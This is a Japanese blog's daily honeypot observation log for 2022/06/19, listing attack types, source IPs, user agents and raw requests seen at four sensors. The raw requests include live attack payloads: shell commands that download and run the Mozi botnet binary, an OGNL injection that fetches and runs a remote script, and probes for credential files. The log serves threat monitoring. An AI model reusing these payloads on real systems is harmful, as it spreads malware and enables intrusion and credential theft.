コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/06/19 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/06/19分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://201.150.187.227:34928/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
JBoss脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 7.7.7.7/jaws;
sh /tmp/jaws
Location:SG

85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

アクセス数推移

JP:総アクセス数:87 (前日比:-11)
US:総アクセス数:85 (前日比:-27)
UK:総アクセス数:146 (前日比:-6)
SG:総アクセス数:70 (前日比:-12)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.222.171.190 United States
4 23.236.147.154 Canada
9 51.120.49.111 United Kingdom
4 71.6.135.131 United States
16 95.214.235.205 Ukraine
2 104.217.249.182 United States
1 107.173.177.147 United States
2 109.237.100.22 Russia
2 109.237.103.9 Russia
14 135.125.246.189 France
1 141.98.9.13 Lithuania
2 157.245.70.127 United States
1 163.125.94.112 China
1 164.68.116.9 Germany
1 167.172.247.109 United States
1 170.231.236.42 Panama
1 172.104.138.223 United States
1 172.245.106.59 United States
1 183.136.225.35 China
13 185.7.214.104 Hong Kong
2 185.100.87.136 Seychelles
1 192.241.206.192 United States
1 192.241.207.8 United States
1 198.235.24.9 United States
1 198.235.24.19 United States
1 201.150.187.227 Bolivia
1 209.201.15.190 United States
1 222.247.14.191 China

UserAgent一覧

件数 UserAgent
13 -
2 Hello, World
1 Hello, world
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
36 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01\x01D\x01
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
36 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /portal/redlion HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//201[.]150[.]187[.]227:34928/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.118.46.208 United States
1 18.221.11.183 United States
1 45.83.64.98 Germany
2 45.227.254.26 Belize
4 50.116.16.97 United States
10 51.79.29.48 Canada
7 52.165.163.244 United States
1 103.164.191.36 Indonesia
2 104.217.249.182 United States
1 108.191.216.117 United States
2 109.237.100.22 Russia
1 118.120.246.24 China
1 119.185.45.253 China
1 120.85.114.219 China
1 131.117.212.14 Czechia
10 141.95.91.126 France
2 157.245.70.127 United States
1 162.142.125.220 United States
1 167.94.145.58 United States
1 167.172.247.109 United States
1 172.104.242.173 United States
11 185.7.214.104 Hong Kong
4 185.142.236.41 Seychelles
8 185.254.196.223 Ukraine
1 192.241.209.93 United States
1 192.241.219.217 United States
1 192.241.221.83 United States
1 192.241.222.46 United States
1 198.235.24.142 United States
1 205.210.31.9 United States
1 205.210.31.14 United States
1 209.141.41.137 United States
1 218.48.190.20 South Korea
1 223.149.202.108 China

UserAgent一覧

件数 UserAgent
15 -
2 Hello, World
1 Hello, world
3 Mozila/5.0
10 Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 zgrab/0.x
4 \"Mozilla/5.0
2 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_34.68.118.83_80\n
2 \x03
1 \x16\x03\x01\x01H\x01
3 \x16\x03\x01
1 GET /.aws/ HTTP/1.1
1 GET /.aws/config HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.config HTTP/1.1
1 GET /.env.bak HTTP/1.1
21 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /cmd.cgi HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /nmaplowercheck1655580948 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
3 POST /editBlackAndWhiteList HTTP/1.1
2 POST /mgmt/tm/util/bash HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.125.236.85 Vietnam
2 45.227.254.10 Belize
11 61.95.183.6 India
1 66.240.192.82 United States
2 104.217.249.182 United States
2 109.237.100.22 Russia
1 120.85.112.203 China
1 132.145.39.16 United States
1 141.98.9.13 Lithuania
1 142.202.240.195 United States
1 148.64.121.254 United States
100 161.97.74.103 Germany
1 162.142.125.210 United States
13 185.7.214.104 Hong Kong
1 185.156.74.58 Russia
1 192.241.207.140 United States
1 192.241.213.185 United States
1 192.241.219.51 United States
1 205.210.31.13 United States
2 209.141.41.137 United States
1 223.130.30.19 India

UserAgent一覧

件数 UserAgent
9 -
1 Hello, world
1 Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
103 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01
1 GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22x-atlas%22%2C%23a%29%29%7D/ HTTP/1.1
1 GET /%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F209[.]141[.]41[.]137%2Fa.sh%3B%20chmod%20777%20a.sh%3B%20sh%20a.sh%3B%20curl%20-o%20http%3A%2F%2F209[.]141[.]41[.]137%2Fa.sh%3B%20chmod%20777%3B%20sh%20a.sh%3B%20rm%20-rf%20a.sh%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2F/ HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.php HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=o5zn7y75 HTTP/1.1
1 GET /__tests__/test-become/.env HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/env HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /aws.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /blogs/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /client/.env HTTP/1.1
1 GET /cmd.cgi HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /docs/.env HTTP/1.1
1 GET /download/.env HTTP/1.1
1 GET /gists/cache HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /main/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /redmine/.env HTTP/1.1
1 GET /script HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//223[.]130[.]30[.]19:49287/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+7[.]7[.]7[.]7/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /sites/.env HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /www/.env HTTP/1.1
1 POST /.env.dev HTTP/1.1
1 POST /.env.example HTTP/1.1
1 POST /.env.php HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /__tests__/test-become/.env HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /admin/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /app/config/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /audio/.env HTTP/1.1
1 POST /aws.env HTTP/1.1
1 POST /backend/.env HTTP/1.1
1 POST /base/.env HTTP/1.1
1 POST /blog/.env HTTP/1.1
1 POST /blogs/.env HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /cgi-bin/.env HTTP/1.1
1 POST /client/.env HTTP/1.1
1 POST /conf/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /crm/.env HTTP/1.1
1 POST /database/.env HTTP/1.1
1 POST /docs/.env HTTP/1.1
1 POST /download/.env HTTP/1.1
1 POST /gists/cache HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /lib/.env HTTP/1.1
1 POST /library/.env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /main/.env HTTP/1.1
1 POST /new/.env HTTP/1.1
1 POST /newsite/.env HTTP/1.1
1 POST /old/.env HTTP/1.1
1 POST /protected/.env HTTP/1.1
1 POST /public/.env HTTP/1.1
1 POST /redmine/.env HTTP/1.1
1 POST /sendgrid.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /site/.env HTTP/1.1
1 POST /sites/.env HTTP/1.1
1 POST /sites/all/libraries/mailchimp/.env HTTP/1.1
1 POST /src/.env HTTP/1.1
1 POST /storage/.env HTTP/1.1
1 POST /uploads/.env HTTP/1.1
1 POST /vendor/.env HTTP/1.1
1 POST /vendor/laravel/.env HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /web/.env HTTP/1.1
1 POST /wp-admin/.env HTTP/1.1
1 POST /wp-content/.env HTTP/1.1
1 POST /www/.env HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.122.125.124 United States
4 27.124.5.21 Singapore
1 40.124.171.80 United States
11 51.79.29.48 Canada
1 66.240.192.82 United States
3 89.248.165.52 United Kingdom
2 104.217.249.182 United States
2 109.237.103.9 Russia
1 113.116.34.73 China
1 115.62.40.161 China
1 141.98.9.13 Lithuania
1 148.64.121.254 United States
1 162.142.125.211 United States
1 162.142.125.212 United States
1 164.68.116.9 Germany
2 167.172.247.109 United States
1 167.248.133.60 United States
1 170.231.236.42 Panama
1 172.104.138.223 United States
1 181.214.206.161 United States
1 183.13.200.152 China
13 185.7.214.104 Hong Kong
8 185.254.196.223 Ukraine
1 192.241.216.43 United States
1 192.241.221.72 United States
2 194.165.16.77 Panama
1 205.210.31.10 United States
2 206.81.0.206 United States
2 209.127.181.94 Canada
1 209.141.41.137 United States

UserAgent一覧

件数 UserAgent
14 -
3 Go-http-client/1.1
2 Hello, World
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
2 -
3 \x03
1 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /cmd.cgi HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /index.html/sfNqUd38H96GleCQVQ2c82GHeK21ZaE.srv HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0